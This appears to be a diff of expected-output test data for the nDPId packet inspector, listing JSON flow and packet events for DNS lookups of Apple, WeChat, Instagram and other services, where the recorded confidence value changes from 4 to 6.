00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625744124010,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1625744124010,"pkt":"ABshv2HAVASmitEsCABFAABK30QAAEARfnwKyAILCAgICM09ADUANh0qX5cBIAABAAAAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAEAACkQAAAAAAAAAA=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124010,"flow_last_seen":1625744124010,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1625744124010,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625744124069,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1625744124069,"pkt":"VASmitEsEL9IThY0CABFAACEUooAADwRDv0ICAgICsgCCwA1zT0AcK3sX5eBgAABAAIAAAABB2d1enpvbmkFYXBwbGUDY29tAAABAAHADAAFAAEAAAK5AB4RZ3V6em9uaS1hcHBsZS1jb20BdgdhYXBsaW1nwBrALwABAAEAAAErAAQRghUFAAApAgAAAAAAAAA="} -00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}} +00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124069,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"guzzoni.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.21.5"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625744124073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1625744124073,"pkt":"ABshv2HAVASmitEsCABFAABM31QAAEARfmoKyAILCAgICNK\/ADUAOB0sVeABIAABAAAAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAQAAKRAAAAAAAAAA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124073,"flow_last_seen":1625744124073,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1625744124073,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": 
{"query":"short.weixin.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625744124417,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1625744124417,"pkt":"VASmitEsEL9IThY0CABFAABsvHUAADwRpSkICAgICsgCCwA10r8AWILaVeCBgAABAAIAAAABBXNob3J0BndlaXhpbgJxcQNjb20AAAEAAcAMAAEAAQAAAlcABMvN\/k3ADAABAAEAAAJXAATLzf7cAAApAgAAAAAAAAA="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}} 
+00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124417,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"short.weixin.qq.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.254.77"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625744124422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1625744124422,"pkt":"ABshv2HAVASmitEsCABFAABY4G8AAEARfUMKyAILCAgICK9TADUARB047MoBIAABAAAAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAQAAKRAAAAAAAAAA"} 
-00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625744124422,"flow_last_seen":1625744124422,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1625744124422,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625744124461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1625744124461,"pkt":"VASmitEsEL9IThY0CABFAABo+pEAADwRZxEICAgICsgCCwA1r1MAVN6x7MqBgAABAAEAAAABCWluc3RhZ3JhbQdmYWFlMS0xA2ZuYQVmYmNkbgNuZXQAAAEAAcAMAAEAAQAAADsABCncnmAAACkCAAAAAAAAAA=="} -00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123796,"flow_last_seen":1625744123823,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57051,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123890,"flow_last_seen":1625744123973,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":42790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00813{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1625744124422,"flow_last_seen":1625744124461,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44883,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"instagram.faae1-1.fna.fbcdn.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"41.220.158.96"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123764,"flow_last_seen":1625744123792,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57290,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123858,"flow_last_seen":1625744123885,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":390,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":57632,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124073,"flow_last_seen":1625744124417,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":53951,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123828,"flow_last_seen":1625744123853,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":46134,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123977,"flow_last_seen":1625744124006,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":124,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":44198,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744123717,"flow_last_seen":1625744123759,"flow_idle_time":200000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":48375,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_ambiguous_names.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625744124010,"flow_last_seen":1625744124069,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1625744124461,"l3_proto":"ip4","src_ip":"10.200.2.11","dst_ip":"8.8.8.8","src_port":52541,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} 
